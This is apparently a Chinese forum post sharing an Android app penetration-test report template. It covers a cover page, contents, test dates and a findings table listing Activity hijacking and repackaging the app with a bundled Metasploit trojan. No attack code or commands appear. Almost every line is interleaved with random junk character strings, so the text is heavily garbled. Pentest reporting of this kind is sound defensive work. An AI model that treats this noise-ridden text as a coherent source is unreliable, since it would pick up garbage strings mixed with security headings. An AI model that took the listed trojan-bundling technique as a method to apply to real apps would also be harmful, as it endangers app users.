找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 4371|回复: 0
打印 上一主题 下一主题

原创-app客户端渗透测试报告之反编译捆绑msf马二次打包以及active劫持漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2022-6-8 20:32:44 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
& u2 f7 t# g& ?7 V9 a* w( ?- ^ : F/ \9 D% v6 D% t3 U9 t& L# b

1 i9 R, e, B& { " N6 ?# B- N; u# ^4 d2 J' ~7 D. M
- A( n+ V6 H' @0 S$ d8 C" ]9 c ( X( ?& M+ t" q5 {9 j8 I

! u- v$ n& D5 ~ 6 X, f; F2 l- _# I9 g4 t- q
, ~' _8 y8 f$ Y' T 2 Y% V9 K' z6 A: p

- Q. P3 R' m, } % ]$ L. {& {9 t( q- T 文档编号:                $ A6 i( S1 n4 w4 H 2 [( C2 w6 I& X% l; K$ ]

6 \, W8 r2 K, B O$ k4 j! i4 _

) m. x8 q( f" S. c# X1 Y+ I , ]9 X+ n) ^) q+ P! |' @4 G0 Z/ J   ]$ j7 T$ m/ I! n% F0 o3 W ( N) M( ~& S; K7 T7 {8 I3 A

) Y2 A; r' r+ C& J- j) g% p* h: T& t& d @& |7 d

{) {& k- F& \! ~) g0 M 4 H/ o5 t8 X* W1 p   0 k8 k, h) g* S/ W( K) E7 Q! Q # i9 h/ S: n# y/ y, W1 @0 P

' I5 K' g' ]8 {" ]" |/ a+ \ ! x6 Z9 V/ ~- g- G

/ D7 K+ S' c' ]- o: J* t, a- N 3 \8 G* }5 J# P% H   " E" b- s! ?- t1 ?" m 6 G0 C! g4 m$ \& f* m! j4 Q

% v! g* n- l9 h7 }& R8 m, \5 _9 r& m

% F% H. |5 o+ O; C( h 0 r# q( h/ C9 B, d* Q/ g t   2 _3 h- \ V0 U+ x7 p; m" W- Z0 j, R5 [" U J" L" @

) ]( i! E' q/ ]* l0 i% i8 M ) u2 G( i7 n* P6 e

) Q {; J2 K+ c0 \ 7 O. y) l" g! e% u' G- ^   4 i1 _2 }1 ?; y, K+ q8 B! `" i+ @ ) M& e; e" H' x0 n- p( r; n

. O2 m* J7 Z6 z7 [. F5 H( r; B8 k+ ~3 a( ?, K0 c

. W; A+ |1 y% B0 F/ ]& Y Q 1 m8 X) \0 b& m2 }! m 某某某APP渗透测试 ( e; @2 _! d) W , s7 |9 \1 T" A3 Z9 O- u0 B! q

: L/ D1 c' @; I3 y8 H+ c ( R$ d% I+ k5 Y, K

3 D7 c7 ~; A2 E2 D+ [& Q ( O% `8 q# A1 f/ `- Q# I C   5 o( m3 U& `# p' j1 S5 K6 T 5 }* ?9 e5 H: q( U1 Z% k) a

* d- J( z: b1 j1 m' z$ r' d3 B6 O. m- Y 3 S( J5 p& h1 J+ ]+ T: x. X& E& P, A

4 Z$ _; g. X' ^0 H% _ 0 ^. h1 ]+ X$ \, {' Y8 I   2 e7 x0 @2 D1 y$ {6 r$ o' \ 6 y+ f* s1 p# c; S7 ]

P+ g" l2 Y2 i* T$ j4 Q) ? x R5 w. n2 ]0 ^: n, Y/ o8 A

0 F& A0 ~' _9 y% x# N 6 B" K% q0 ]; G1 B8 [" H) C+ Z8 d   / _7 w! M d0 A4 u! X. @ 4 g9 L0 \+ A4 Y: i" s$ r! f4 h

- m/ Q' P @2 x& B5 p+ O5 s5 ?: U4 ]2 m

) y. e6 Q3 B8 Q& | ( k" \8 a( W- C5 D8 Q# A4 a   . S9 {+ y D* T, h) x( Q1 @ % Z4 [/ W- t# C! L

4 {! c/ ^- j$ C# ~6 j 6 v- k3 Z+ p, j' o% e. P Q

' m6 R9 G8 I. M2 H# {2 ` / \4 h. ~: C( j6 B1 F H2 M( r' J 技 术 报 告 / a' D6 W6 p: U; o& P) \. \, g$ s8 z' |

, S$ a& q0 n0 C* J6 l# _ 7 G. ~6 x6 ]1 m$ n& O7 x1 M [

& P( I3 _& M; F8 y, Q: B P1 l* ~' m- }: L/ G   8 A2 A5 F( m, M+ f 4 j5 C6 q9 J" l; ]" _

O5 ~" V) o: c0 K 2 c2 X7 I! n% ^ A. f' g# D

2 h+ Y. T. ]5 n% ~, _ : F+ i3 y8 T& I   + i: a+ P; R6 ~4 T # {6 W4 |% Q) L, x

) a- u& j2 q& C0 O; b* D) d2 u/ `% H0 }. K3 }; o2 i

3 p. H# c w" B! ]) ]8 M4 B ) k" O' P: u# {* r: k/ W   5 H9 o# l3 B* O+ d: q* r * K, b5 ^2 M, P: c }8 a( ?+ E* u

3 [! N3 e$ B' ? G* z! A4 i- W* u" M( i; `/ ^

$ I7 Z. f T L* @5 p% n- t4 s6 T 7 ]6 P3 i$ g7 ~: I/ Y6 y) c1 K   # ?" W# [+ L8 ?% H + B6 d" V# j9 q+ D" ~! r

6 d: Q0 O* R1 @9 A! j * a9 N3 p, ?3 S& B. s1 V! Z7 b4 K

) z4 o g6 ?( x- h , ^7 _, J8 s7 ]# C7 [   4 P1 } i0 k7 D: ?! N 7 V7 `- P* n1 M t( q6 ~

8 Q/ V* F( f/ n 6 F$ Y* E% r9 j

& c( n& b0 B9 w! k+ R( e4 V+ ~3 B+ Y9 p. ~   ) k* t k0 m+ ^. O6 K% z - o0 L6 T5 |* |- u- s

" q+ _+ ?0 |& g* ` * I1 j: t, @2 l5 F9 ]

4 l- Q. ^ H9 c. N3 g/ d; f + b4 g6 |: n: i   - L7 X+ m6 y. t) Y+ a . S! ~$ W: q8 r# [% w' L& _

* P# @# Y3 s$ C/ o w$ O2 G2 w) {" P3 l* E" M

- {: S2 `7 _' @ - z+ h' F% u1 p, @; F   / z! c7 A# h7 |9 y- o * {) C# A; [2 ^! c6 K; B9 y

, ]5 v0 T3 z3 C9 K # \ t. L2 p6 y5 y9 W: T

9 p( J# h6 c# [$ m! ^7 b/ }. [ {8 g, K$ l' g& |7 }4 `7 [" Z   $ ^! ?5 e- f$ C/ L/ T + s; A$ ^% J3 w* k

6 B/ h' P; G- ?% X# @5 D % g* _2 ?6 p) H0 B+ U' {

: I; O6 b; ~) \: n U2 `/ i: \* f8 D( m8 X$ c   6 j; X: y: J: B ! n4 s) }! y) q

' c( w, P! o% _5 V$ J7 G% R/ H+ J * c) Q$ P8 L! Y( G( B

1 |/ J9 M& f) f+ B 3 _! ^' v' N$ S: ~$ |* d2 D   # m! |" K8 E% Q ; W8 J4 A$ R+ b# \- V$ c: D2 d

6 P5 f) O+ j8 v/ m% j3 x1 ^! X* L# B' e# H

' r0 d& o# L: A+ @( y7 ]3 ?9 T5 M9 L; A# q G   ; U1 }8 Z' v: w5 L8 C6 [' W4 e- R+ k. G) b/ O1 R) ~

. W! @: V- D2 h. d& W / _' H4 v* I. W! d7 z- {! K% F; s$ |$ P

. o; W* m6 T' }& c ; f9 x* p0 `7 g% }; a! M2 O" V   : I: {6 p& h) m! c. k4 z , L$ T8 p% ~6 ?3 e9 }0 ]

' \; f! k0 m5 f H: s8 ?4 { + J! k6 E0 Z( d; q. U& J; j, U

6 W! @, j7 t" v% F6 x! i2 b$ m: E- t# q) ^, R* a   0 d. N4 M' u. `! P3 J7 y+ I) G 8 E5 a( \3 l: C- E! T) E3 h

, G3 M) a! b9 y# N$ ~ [, A0 s5 r/ H8 R* M( y& @" L

* y9 J: U# b/ B- k) i/ w" ]' |& {5 z( Z: z6 T, [. O( V) a   6 `* d$ |0 X9 R4 O 4 o8 \& s" t+ z- i

1 l5 k8 C+ C2 M8 d 9 N( I' i( B1 e, P. H% p

/ O9 ^- n. A; y% l$ n6 z 5 r( y6 V' b% h0 E5 n( c* M   " b4 `, _3 k, }$ ^2 B" I' @ L r7 }# c0 G1 v& [% ?- n

1 H. `( \$ v# Z , S+ t+ [& q) y+ p, ]

" V1 }1 J& d7 M Q4 r7 T 7 \; b& M! C, K# ]& v, N   2 i3 S% c6 X/ x( }* Y6 |, d 2 j: h$ J6 U/ K* R9 j

+ D$ Y9 a, M7 e5 J( o9 X+ J4 v/ j& L+ T3 R! t6 I

" Q* u. _/ x7 m- E, a( W, d . m6 Z9 L4 Z& X3 |1 c   1 ~) h) A7 E$ d. h + l- _7 O8 r5 O* E8 x/ a

1 _2 @7 g8 r$ j$ G. b. B: R % j0 O6 b- x2 N

. ]- O! M/ R; E3 l 0 |5 G' T! Q4 `7 } 二〇二〇年 + `2 _2 \# `2 p8 Q' H `( E / s O* n. e, K, Y+ e' b- V

1 R& Z% B, o) e0 i. } 5 X" ]; v5 ?! s D, U/ Z
, e5 g( P% c) x% Y4 Z) _9 u+ B# d& v- Y9 m! l9 n( p! }2 d
v% l& i7 C# c6 F; W6 E! i* M1 i9 i1 {( b- f6 Z+ k" ~
& d4 I% |+ E: R4 F , \7 U" R. Z) `5 X8 V5 X
( u* U9 j( [5 r- O- Y: B" v % t6 O2 P7 @% e5 `+ A* {% M ^
; R% d" l6 v& N : b; ^! a3 V% p5 B% V+ y1 `
9 u# W. X; J# F. s ( ]' b# y! b* q$ h5 D4 C+ T4 b
8 E" p5 ~# q; a% \ 3 _- d0 k: C/ K& T& p
3 L! V9 m; f' H5 k 5 @! ^5 j2 c" K4 d% Z6 D

. c% v. I& n7 n4 Q" \- _' U & H9 n6 d' x0 C& H& e, g1 q$ x; N 目 录 - z) k3 I2 }$ n, H d! _7 p 7 g* }9 [" P$ [) g

5 N# [6 V1 R% W* c* e. ~3 X1 V( {0 @ # i4 c( W. v3 D' P / I7 R# y; P9 Z( m: [9 i # K" \8 I5 q0 B G; R

# ]$ {: E% B. j4 v& ^ , Q: X# E' v7 D0 x4 B# ^( k   * e0 V Q Y# m5 t9 W! K6 V & `0 \2 n% u6 G* a

) K# s) N7 _# M ) {( e6 o6 C6 ]" B

& `8 r8 B! K8 Z! [ ; n W# [% ]: Y% b 1 概述... 3 ) V# K3 T: _6 Y/ C* U, a3 L; H+ |* ]

x. B2 Z+ z! o- H . I6 ?+ \; V: j2 E5 a/ @$ S" s$ r! a

; j8 a1 _- N- l% y8 C6 i( C . _8 i2 N3 K# G7 k, ~1 D) H 1.2测试时间... 3 T2 I9 p% A' A3 [" w3 |( x % i/ w% U a$ x; a; L' O* [0 [

( s6 x& i1 k3 } , R& e' j4 }5 w6 [

8 L4 g# l% B+ e S2 A # k* z( Y3 c! v) m, g* \) c 1.3测试对象... 3 4 Z3 w+ ^* I8 l& S: Z& ^0 l8 M/ S* ?

: |& y- @+ W1 R/ y5 E: n; | 8 E* c$ L& p1 G- X) P8 w# d1 S

+ o7 p C' J9 e + y" L$ ]+ ~! z$ R8 A! j$ @ 1.4测试结果... 3 . }8 Q E. ~6 L4 L+ z; } 9 W( w5 e! n t

# m: w0 X% y. P1 o 6 B$ {4 g" L9 v( @" L

: P0 Q, N$ W' Z) k: p+ m" q; R6 `$ j7 [+ t# d% z 2 检测结果... 4 9 h7 z% J; ~$ D' t' |* S7 Q6 X$ D4 B

- c) a% ^, H! h& I . S4 `& I( Y( n) {+ h! b" X

) G: `* T+ P; J8 t% A9 p( F$ R $ ~0 V1 h7 [1 @5 \" ~ 2.1 某某某... 4 8 E, f6 I! I n/ x! [ s. D6 _ 2 N; R" k% l# I* {

! W6 p) z. [8 O. _ 4 R& _6 T9 S. k, O5 @

+ N/ G! ^8 k1 |. N- ]0 `, P2 t ! [1 T; l5 ^+ @2 b) z0 x 2.1.1检测目标... 4 7 A/ [9 U$ m% X0 ~6 h R, I9 s2 J ' ]8 \8 @3 p7 U

q( B0 r2 n; E' [" ] 1 w& U' _, {7 ~3 l& T; N* Z: c; B

+ Q0 a d! y9 K J! Y% X8 X/ s) w9 I0 z# X" @, T/ B 2.1.2检测结果... 4 - p+ L' X1 F. m: ^3 S) B" }" [ a7 V. ?

8 X9 P1 a9 _% a4 u 4 ?4 B( J) x% @: [- a& e

1 V! o, N+ c5 V s; @6 V ^# U 2.1.2.1. 4 & [; u; A7 }: H, t3 l 5 a# T+ ^9 f& H" a

9 F9 [% i) Z l3 F% B& f+ u ; U( B4 ^ Z% K& m) S

1 S0 A3 ?5 O" V ; t# Z% ~& _% d 2.1.2.2. 6 9 i% Y% m4 S! u& f: b4 K1 } ) l' B& C9 V3 o. q9 ~

5 p1 z' S* r3 ~% R" m. y2 h0 I 7 y$ D/ n1 U; F& i

, V4 U) s+ X$ F 6 V# v" [7 t& b0 E" Z8 P Z1 i4 F' q4 V7 I' k / @4 a% H: M h4 [

7 }: A: G: X- M$ u & N. U5 }6 ^, M; a. O) G! ]
- J- J, [& f* ~# S2 x 3 N$ N$ K2 |" Q+ h3 g/ U5 ~
8 ~6 M0 b0 P" K! z$ j , ~6 H* F. y! k1 s) f- T& P
7 y2 ~7 X4 U8 P0 F0 C# c$ S $ O5 J' X' h. u4 q) _2 N$ d7 c
5 a" i$ Q$ q6 }/ ^9 x, \0 G; h: b% o+ `# Z

; ~2 ^0 B+ |( @" l {$ ?* J0 ^ 1 概述 # Q) F- V2 o4 q, C8 j 5 p0 A: c4 W9 \. _9 n

6 j2 y) d# s r9 D/ n; H* Z ! C* L7 H% s% P( g4 r$ a" o

6 J$ v" Y$ Q. b2 q3 |7 x% _' {# [! ?7 R2 k8 P4 c: t. [* l 1.2测试时间 9 ^* {, ]1 x8 k1 W% X - ?% N8 d6 n! v! g

0 s- Z) i, f( M) T 2 }: J, q) L8 B) O" J1 ? 2 |0 i5 C; g1 m4 ?# {' i8 H% c$ W4 C* m/ L/ }* M( {# H0 V; c: i9 ~0 S7 `- C- }+ I4 M; k$ j$ x$ v( Z+ c& `. C, o4 S* h$ ?% M" Q: P- s* ]3 J3 j% f& m( L/ V: e+ B( x. F* Y$ [; r* ]" `# y( t5 e+ }- ?- f8 t6 {; O* @$ t. c2 C8 |' u. @* ]) d/ J9 |2 _+ Z/ t1 T" L( B3 Z- @8 A% |1 R+ n/ _7 O3 R9 v. K5 x' J' s* r2 u/ N- C6 S0 m% ^: l6 K+ x! @* S( ]9 F, `* ~* S8 H( l. y1 U; I* T( X+ V1 O- }, j% o7 J! Z( h( t: |0 h: ]9 ^9 d' J1 W5 V, @# P/ [2 y1 \/ x# A7 ^3 q: G+ V+ o2 r" W$ C" A! N% t6 u- N6 l @0 d0 q3 R# r6 ]( S( [0 D* X |4 A0 U4 v2 i; f* T, B. o) a" P: L7 x c% D' q- ~( Y9 g' a. _' N9 a7 j/ q/ F0 A' P5 `; d& [, M& w6 p: h; `4 \& c+ N2 x
2 u! Y7 @- c4 E, r( q3 w8 D ) b5 |4 O R0 j E H0 \! J

6 z+ h0 y: X4 B `2 u" Y 4 ]7 {* e- O; J/ J; x 渗透测试时间 . ~$ [# ~* U; k, p 3 t4 v: x# K4 R3 _. m

) r# Y# x1 R8 @ 2 t+ z* m: c& _/ j( j( ^
. r5 v* @# X8 w4 Z( H. P4 m+ d7 G9 I& A

, |& D, h! {2 R2 U1 T2 j3 p) C% o- J* \9 d+ m: W6 R2 D* C" s 起始时间 3 f/ i; L6 }6 r e 2 d1 s6 b7 E/ M" n

+ r! w: ~: T: ]! F& T ' l% @& k, ^- u5 `
$ g8 p' |. G( i6 ^ 0 w8 r* E9 T& D3 N

" O* H. ]; D; x. \7 O; { - B! V2 S8 R/ t0 U0 \ 202046 / v% f8 G5 E' J' k! D 6 Q9 T$ J. P& }

! j6 F/ D4 ~* {6 r' m5 n) |1 a7 A6 |2 |
0 [3 E% I% L' u& T ) Z7 o* p4 H4 e7 q' N* P& h9 O

& W9 r$ @: r9 k6 G( W% X& N# d 0 R& o: D! l0 u8 c; q 结束时间 9 A# s. U3 V0 ] 4 @4 ~) Q y) L" |1 ?" v; {

, o$ ? q; d- u m & ~5 ^' z* W E" g3 O+ g! m* r q
0 i' ?- m+ U( l$ z3 s% g 2 i. n- Y' n! R" P

7 s1 t& ]; G& F; i4 t+ `" b! s/ a( k( G: _1 R+ r 202049 # V* V2 Z4 P6 G , t l- x- L5 W/ e' P

: Q% j" y# Y5 f2 t/ {, K- L3 ^: q4 X L' Y8 ^9 \/ M! o5 p8 e
. _, e& i# F# m$ E/ S- u0 a ! X1 h) t4 w% s- k5 b/ w; K

; }7 I% B% F: i d) Y, Q/ i 8 V! F1 P" v H3 F' q' A 1.3测试对象 - `/ t4 |6 P" ` : r& R. g2 D' N5 S: p* R: D! K; b) y

) t5 O# L( T% A+ v' r / g& D, g4 `+ d! Y( X/ r4 v

7 i1 z( [7 A3 V+ ?; U$ {, I 9 {% X4 \) ~/ k) t( s" J+ t6 E 此次测试目标为某某某安卓APP进行渗透性测试,APP存在安全漏洞数量如下表所示: 1 e% J5 }" q L1 k% ? - A8 P# W$ O$ B

. d, N# L v5 _ + E# {8 {5 P+ e3 r- E* {! ^) k

; e Y% u: L1 V1 p) y k9 d. I* m W2 Z/ v3 W! j3 J! A- o 1-1 检测对象 5 C" _, }* z# m; F5 G# x+ E ! ]4 t$ M. B5 M$ w j1 V0 y% t

% r& d e7 g6 U+ @2 [# O% l. H3 _ $ l2 l8 H O( @) ` 4 Q/ _/ E; X, ]" m' \+ K) k2 D- h. R0 U( B( e9 N! k# O! \3 U9 ~8 G* Y* F/ H' v9 k% c: o% w- v0 W; z# b1 ~( Q5 }- r/ F! X5 E8 h9 M6 f% `' C% \. Y4 t9 u3 D% G) u9 d1 ~% }8 Y* {. Y/ o; N% `5 l( w0 I2 j0 u! ^1 i- ?$ ^ G$ I0 i+ F' e$ F8 z; e# @* Z, N: ^* A. H9 E( g* K9 j3 y; {$ G$ y; O( {; ?5 N- g. M8 ^* m1 M! e( e7 U( X& Z; Y& n9 Y6 l; P& `( J% u) q! X8 X/ h! n* a/ | W; W. ^ G3 L7 U' N J/ b8 B0 x+ x" w' D+ l0 \* U) W5 Q% k% ^6 v6 U2 T4 o' |3 }* D& \! Q5 K: u# G0 I6 [- F* _6 w1 d" {; ~( g1 ]; v2 ?, R6 U/ y6 N4 }4 I) V. J# t$ k9 D! b) e* E3 M6 M4 m2 z: ?8 g; E5 m w7 N+ S8 Q* T' P2 w8 @, R f$ r+ k$ D+ J1 G+ C* U# u. {3 q- f# [) `, ?. j- l Q: H3 _/ M0 b5 Z* w6 _6 ^8 w* p) T4 @: C8 D/ M
6 C% e, m: b$ J- n8 P# ? 2 z+ _) g* g2 }: ~, j- a

7 ]% g- G( ?, D: @& d1 D/ Z9 p; H5 h! K- a+ o1 x1 a n 序号 7 Y/ E2 Z6 h7 ~% o - f+ i! z$ H$ Z7 {% o0 m, D

# }& q: d- o4 S% X% a E ! e0 ^5 |! R# V) t( J- H
W7 l( J* @3 A $ Q8 a) Q5 u2 r N7 n

5 A% Q5 r* x1 G5 I% k: _ % m! |& x: K% I; a* b 测试对象 ! @& U$ T4 j6 _- n : F9 B2 c2 ~% S8 R) P( @5 T" V! m

% V' k8 y' O* r S * u8 N6 w* A; G' S
9 C" m- W$ l2 t1 N) v2 \6 y ! P7 V. J2 o- m0 s4 P# Z

5 ]' s+ F' J9 ^( w! e# z7 W! `& ]0 w0 F. _, h$ t! A 测试地址 0 k! C0 X$ Q8 A9 W 9 N1 }5 R0 Z+ @0 w- \

4 X/ k8 W! t$ [9 W ! g6 ~- ]! n$ \" g# e7 O; @' o
4 m, @$ N: j, T* @8 ~ , z/ B/ y' D' k9 W- T% R- g

' c$ t' D0 U4 p. A/ ~9 w Z) _7 m+ E* }( B4 ^8 b8 J, w' [ 安全漏洞 l/ {9 B$ Y$ \( T1 x 4 \. m9 N X( [% ^* D5 y- I

" y2 \" t: S. p ; _% \9 \8 G% f5 C' |& \
* m( n, I8 f9 D6 w4 ]7 z 2 `# O+ ]; ]' G/ D

; S5 ~$ R2 I! W$ W8 K; n " d Z% t5 b% B! n2 r2 Y' f6 |5 O 1 $ h3 f1 K9 \5 h. d' E8 _3 O' f2 ^* s/ Q: |

) R0 o. P8 f( X! }2 H; p6 m: {$ V4 H! i9 [6 q9 v& |7 g
. @0 }% c) A% Q* R5 v0 f9 b6 N, K9 F( E1 @* u

+ L8 V2 |7 }! ]+ C A. q " M: ^6 z9 j: L$ z2 [+ h 某某某安卓APP 7 G! l6 f. Y" I' c/ D9 ? ' |0 L: r( h3 o

0 ]5 P0 o5 M) d |0 J1 K- s 6 x1 m% ]& B) f* @
* L' \ E: I+ @- T3 Y$ ] * [, ~( y/ d- x4 W# R

r' V+ t8 \( {2 ]; t9 J \5 t. O( h+ _% Y9 |   , y' z3 O0 u+ s8 x U1 x2 ?' k {! }! C8 H+ F) J, ^

9 p0 k5 r0 [ b# o , D3 ~- m6 D- K9 s" C
0 ?4 V+ P n$ r0 ^8 O 9 F( c5 ~" e1 ^

0 }; J/ ~7 t8 N: |7 W6 l6 Q/ | + t+ @8 N* M# H) O. T% H 2 7 C% ^) D' v4 z& @% _$ N& y l 1 w8 ]5 A2 H R1 e5 k N6 ?0 d

9 D% f1 I- B$ `" s7 D9 P6 n5 [& {" i+ n! Z( q7 x4 m( |1 w
H" C" }2 Z4 y' I- c ! ~# a- h) U$ R

- g+ R" J9 l: {3 K ' j+ ?) J; o1 s% E) J7 }% Y2 r 1.4测试结果 " c* z: {% o9 [( r7 ^ ! ]! @, F- v4 V$ _5 [$ r* I

, D4 ?" D% H. ? - ~9 p8 K# h: M( l0 S

$ m$ h7 C$ c& I& H1 d% l0 ^' M9 {* B3 g! Z' U1 { 在本次对某某某APP透测试中发现,APP安全防护存在一定问题,主要问题如下所示: 7 d }7 P" \2 U7 \* ^7 v7 I/ p! y3 U) I

7 w1 l4 Z" A2 K( ~, m" I: X& y( S

0 f$ D& F; F+ f) r 6 j3 A9 I! L, k2 F* S% P   9 b4 m8 @9 {0 {+ z1 I! r' k; k: n C4 s# D6 z: ^

7 Z9 y. j- b* R5 W( U+ ` ) K! c2 L# k1 k ?
9 U# m+ ?1 W6 V# i F8 Z6 @ ; E% w+ C3 ^# d* F2 X p( G( R q1 P+ z% b' R% N) A! q0 e. y% r6 H! Y" g( f- z/ @' \' ~" ^* h- B6 R, L! b" J* B1 c6 A8 }2 H' t% n& B8 {5 C4 V' X# J- I$ B" i* t1 Q& H A' A! `: Z; I- o, V1 y& N( r" g8 _8 s2 W1 u4 _9 _+ y2 Q5 X6 J4 N8 l* }( d# T4 `1 J1 f' |! a/ D0 Y7 b7 |' W/ Z; ~+ d+ m% A6 O+ t: A# U2 b: m# U% G2 @8 g4 b* }* d5 A9 {) S) e9 ?% G& s- i; n/ Q7 X( F z2 H% w8 J0 _. v+ }. W2 d; G( R7 ]/ T2 h3 y8 ~; L$ N$ n% { u0 y: {2 E$ g, j/ U/ }+ [. @3 j" W2 p6 |9 X) w; ?7 W$ G. }1 U- v+ Y4 g% r: ]- b2 z+ x1 j* D: S4 n, b( `- o9 O9 h+ O0 I* H6 y0 J6 T3 H) R1 ]4 `( t$ X5 a# e. e+ v% c2 I2 v) r* { J0 |" T2 @0 P0 h* N( h3 n! C8 Z9 k$ v2 m+ J4 b$ s% a, j- f8 g% Q, X/ k) G* r( O3 H1 N k/ m7 s; R: O9 L S& O6 p- X$ C8 q% ~0 I/ A- Z; } D, d+ Z Q: e" y( A, m+ @1 U& U3 @* r4 i# Q4 L6 w0 z7 Z4 C& {: a7 d2 a. c" J3 ]- l& R) u3 c+ m t$ H# F4 z& {+ u3 ^: ], n8 l: I1 M" S+ F) @ {9 D9 U8 n$ [# ]% f; ?0 B9 ~6 ^ a9 u) r1 Z8 r# S9 `9 q& M3 r/ ?& n0 L8 j! _. w' S1 ?+ J) E# _/ l. t: O# A& }9 x+ W/ j9 e! a7 H7 o, N2 f: n g" E9 J" A" j/ ~; N: P! q( {- \* g* Y& a6 e4 e$ Z; t6 j' s. ~* S" E; i: b; x: l! j D7 {5 ^! t) o1 {, H' F* ]" D
1 X% [5 d8 j1 o0 U+ c, o+ e/ a* }$ B1 n' I5 V- D6 Y

+ _" {- j% }, Q ) Q% e# n: J( }5 G' v6 l7 y5 ~% j 序号 ( G3 ~& P) z' Z3 q8 {2 P3 q0 z 7 \ q+ y* ~1 d$ Q2 j- N

, K. f% l6 D4 F" y+ u5 ] , V. n$ d- Q6 H3 c# |3 E
" q$ S; w4 j3 _% t# d, t j7 k! C/ c( d9 F& G

' X; `5 i. i5 @' {2 y d$ d4 ]2 q4 [4 B5 w, T 系统名称 1 K: |( A* Q" P% l# G9 t7 ? 7 h$ ]$ q1 V0 Y/ S, A

7 A1 I: u- C1 M' l+ f. W 9 H3 W% [& J4 H; ~) m, k* G
. `! h8 k0 V8 J T# i+ |" E" G' Q$ F* a

( t4 Y, B! d* @% a1 z4 W% Z6 b Q+ T! E3 B% v 漏洞名称 # E" [; w& z& o , g% {8 S1 ]0 f- |% `

3 ?8 L$ n0 h! b, J ' _- m0 {0 H) O2 Q5 r& P6 m
5 k. l; T& H; {$ ?1 m7 h1 E& l3 h& Q, M) k9 h4 Q- \

6 }3 N9 ]9 r9 T% I" l3 t' V3 h; P# u , {1 G1 k! f2 t _: W. J- J 漏洞危害 - b" f; S! P# L \) }3 m W * h3 Z4 d1 Z$ t; N3 x6 f

! Y/ Q2 s6 K, W! a& b# s4 J+ v . l4 F/ P) c6 h' P% L1 c: T
, [; X' {7 L4 i H( k. S. H& D( {

7 Q' \$ H) V0 a; M4 w 0 p! R8 l* y+ m5 y* A& T+ J 修复结果 2 V5 @9 o! i( \5 b: D9 `) | 2 D8 {& ^+ O/ a- H9 b1 u

, H. i8 r8 K1 j% r( K( S* s 3 T$ t. h$ A; W! `
% a$ E4 G2 ~. Y" w6 e0 G" Q 4 X/ b- L8 g: \

' H) C2 Q, C% A3 @* Y, V+ q! b* _ : x2 Y& V$ A( n, I" T 1 " q. e8 A# I* Q1 c: x' J& Q2 q$ I/ D h

) [& ?6 i1 b7 K# e5 l" v* `; \( p 2 Z7 Y1 z* R9 B% f6 J% s$ j1 m
% P9 J4 g; K# g. P, E& j9 J3 Y" @# `8 w

0 f: ^- d$ V, O: O! V; E4 {& T4 V 1 B8 w( Z; ^( d& H7 Z ] 某某某某某某APP 1 I- T4 v. u) r& @5 n + q4 w$ @& U7 L6 e& E4 W

i5 B# S( ^% r3 J, K ' G- w6 X4 T5 g( a4 |
9 M8 e' {. @" q, c & C. H$ C- H; m0 Y z

3 X7 s6 W& V- n( {0 v9 J0 S! w+ c1 E8 J; E( q Activity 劫持 : D3 ?1 x0 R5 h! t r* g7 m; c9 A5 z' |( ~7 x/ w3 O2 ~. z! U

( y) X! M3 b( K+ V8 _8 z, [: z- c* V( |+ G- ], t8 K

2 k: k8 A9 F+ e 5 Q7 }% v' `# J   1 B- l. l5 E* P0 h1 B0 x7 M) z/ y n& L9 b

7 K& @# N6 u/ z 3 ~' v- i9 H; W1 `- L: X% C
, v% m3 w& j& c ; Y, c x3 t M7 V N; ?

4 P" o* T: o$ B# e, }% O " p9 F7 y6 i) a+ ?: o/ Y $ ^ w5 j4 }; ]# `1 K: g $ k' p& h) }6 | `" q

7 K! N- M5 `" l ; [ b9 J; m! l6 f7 P
8 H7 W+ a) M( o. a8 k ) f9 `8 n9 f3 {1 z

2 d! `$ ~8 c3 m$ c . v1 S7 a8 f: X4 L/ K/ ~/ c   1 m, w: ~1 |+ M+ q. O, M ! J0 E2 O2 o4 n

) p5 R- C; `0 h! m+ ]+ V1 z2 U( z C
3 r* Z+ f8 A/ d0 R1 z, Z# _/ Y! u+ s* p2 v! Q

5 k; s/ Z4 I7 y; G% x! H ' B' Q- X. i# c! H2 x 2 1 t& q) M' V! d$ K" V7 ~. k4 T ) M* k8 h3 A/ h9 a! p1 P& ^

5 F7 Q0 ?! Q& C' ^4 E% M( d + @1 Y* |! M0 N: @6 q* c% A
0 L' C+ O2 O* n2 c. n; d7 g4 ~ ; e1 s& [5 n1 B \

! R5 N J5 A9 q6 `! J : q5 D' R; l, H 某某某某某某APP 4 }; d0 @$ j- v8 f: i0 d, ^ % r j$ Z% [3 w5 r6 R

, G/ q; v9 z* r2 H/ ~9 b% Y" ]. M+ |1 i) a! \
/ ?/ z B- `" ?0 R3 C% M+ W3 R% D D k% N) D0 g) H" H6 X* Y! d: j7 ]7 r

! ^7 a, R* H) G1 [- V; e0 ~( A: n; u' ^ E V 反编译二次打包捆绑木马、篡改APP代码 ! j! a% G* o1 V, {% P$ [2 e, K* f4 H! h- r6 \8 j+ l" p+ W& k

) o/ @# \" }) D4 n # Z1 B; O& z: g4 O5 T6 S" L+ Z
3 k0 D# ?4 d+ s 3 `9 |6 d" M2 h2 U3 b; r$ C. W

2 U( C' K0 Q4 E* f8 j ; c# T/ k3 D$ a. j 0 @ R# h1 F6 r# s; C% b7 ~* v8 C $ v2 M7 o$ z B& d' F

O% a) Y; r, f: O4 S# g+ n4 W5 E" J6 ^, V; [ k
5 `4 t- c& r9 \8 k3 x h& i& ` 2 {' s6 P' R) ]6 s$ [) P

' C1 {6 c# x! q ]3 O- }' I( E2 @/ r   & G) o: ~; g2 S 6 R3 k. G7 q% ^/ o% z, u8 ^1 k

% @6 e4 _" m; o; V1 g 2 J6 K D. Y5 e2 o+ J4 ?0 } I
6 v5 L& G# k" y# j# }6 _3 H) e5 ~' ]' ~+ @0 R9 d6 `' Q0 G
% H6 m( t. Y, r % \0 x% o1 h. z" b" C

}- M* i4 E4 E( u- e ) S4 u- j" T4 ]# [. P$ \; S   ' D5 L2 w7 [) C, V `. O1 G3 ~ & ]& M2 q: _! d4 k+ |* ^

, s' k" |' }$ \" t 0 D0 m9 w0 R4 L: ~

" \# F" h7 N# H( ^! s 9 @, v3 F4 A" ?" l 1-2 测试结果 & v' [: l; ~2 v6 M2 c# r' H9 W - q( M5 Z: P* b5 Z+ R5 _+ K0 y/ m

3 e4 j6 u' n: ~. {; S- [ 3 s- ^! M$ M; W- `

